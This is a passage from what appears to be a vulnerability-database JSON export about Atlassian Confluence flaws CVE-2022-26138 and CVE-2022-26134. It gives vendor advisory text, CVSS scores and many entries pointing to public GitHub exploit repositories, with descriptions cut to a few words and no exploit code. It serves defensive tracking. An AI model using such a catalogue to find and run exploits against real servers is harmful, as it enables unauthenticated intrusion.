documentation|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html].\r\n\r\nIf you choose to delete the {{disabledsystemuser}} account, you must also [uninstall|https://confluence.atlassian.com/upm/uninstalling-apps-273875709.html] or upgrade the Questions for Confluence app to a non-vulnerable version. *Failure to do this could result in the account being recreated after it has been deleted.*\r\n\r\nIf Confluence is configured to use a read-only external directory, refer to the [Delete from a read-only external directory, or multiple external directories section|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html#DeleteorDisableUsers-Deletefromaread-onlyexternaldirectory,ormultipleexternaldirectories]\u00a0from the same document\r\nh3. 
Frequently Asked Questions\r\n\r\nWe'll update the\u00a0[FAQ for CVE-2022-26138|https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html]\u00a0with answers for commonly asked questions.\r\nh3. Security Advisory\r\n\r\nFor additional details, refer to [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html].\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T17:06:14", "type": "atlassian", "title": "Questions For Confluence App - Hardcoded Password", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-02-21T15:41:00", "id": "CONFSERVER-79483", "href": "https://jira.atlassian.com/browse/CONFSERVER-79483", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:36:53", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected 
versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-11-17T16:29:26", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:36:52", "description": "This is a duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-14T05:09:59", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-09-27T23:23:45", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T20:24:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-27T23:19:44", "id": "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:33", "description": "# Atlassian Confluence \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f(CVE-2022-26134)\nFoFa\uff1atitle=\"Con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T07:54:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T08:02:12", "id": "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-11T08:26:03", "description": "# BotCon\nAttlasian Confluence Un-Authenticated Remote Code Execu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-11T07:50:57", "id": "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "href": 
"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-25T02:18:51", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-24T23:43:54", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T18:02:22", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T13:02:10", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T03:47:11", "id": "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:16:27", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-14T01:28:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-14T10:35:04", "id": "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:21:40", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:55:37", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T22:41:05", "id": "469B060E-C585-599E-A0D1-AD5D186F70FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:12:10", "description": "# CVE-2022-26134\n\n> \u7ec3\u4e60 go \u5199 poc\n\n## \u7528\u6cd5\n```bash\ngo get -u -v gith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-25T15:29:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-12-26T05:18:26", "id": "7C531491-7EB6-51AA-9072-F345BDB61AFD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:28:53", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for 
Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-29T13:45:18", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:33", "description": "## CVE-2022-26134_RCE\n\n## \u5b89\u88c5\n\n```\ngit clone https://github.com/y...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-15T06:01:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-15T14:34:57", "id": "252F889F-2BFB-5D8D-B1CD-63075FB7EC34", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:19:53", "description": "## CVE-2022-26134\n\n## \u5b89\u88c5\n\n```\n\u4e0b\u8f7dpy,\u672c\u5730cmd\u8fd0\u884c\n```\n\n## \u4f7f\u7528\n\npoc\n\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T11:37:33", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-16T12:03:51", "id": "321617C5-08C5-5919-9510-2571831D052E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:29:59", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-11-09T18:16:01", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:30:11", "description": "### CVE-2022-26134 - OGNL injection vulnerability:\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:04:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-10T08:52:10", "id": "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:10:54", "description": "# CVE-2022-26134_check\n\nThe script is used to check remotely if ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T20:11:27", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-19T23:43:17", "id": "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:23", "description": "## **CVE-2022-26134**\n## 
ATLASSIAN-Confluence RCE\n## \u5b89\u88c5\n\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T10:44:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-18T09:07:52", "id": "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:18:09", "description": "## ATLASSIAN-Confluence_rce\nCVE-2022-26134\n## \u5b89\u88c5\n\n```\ngit clone ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 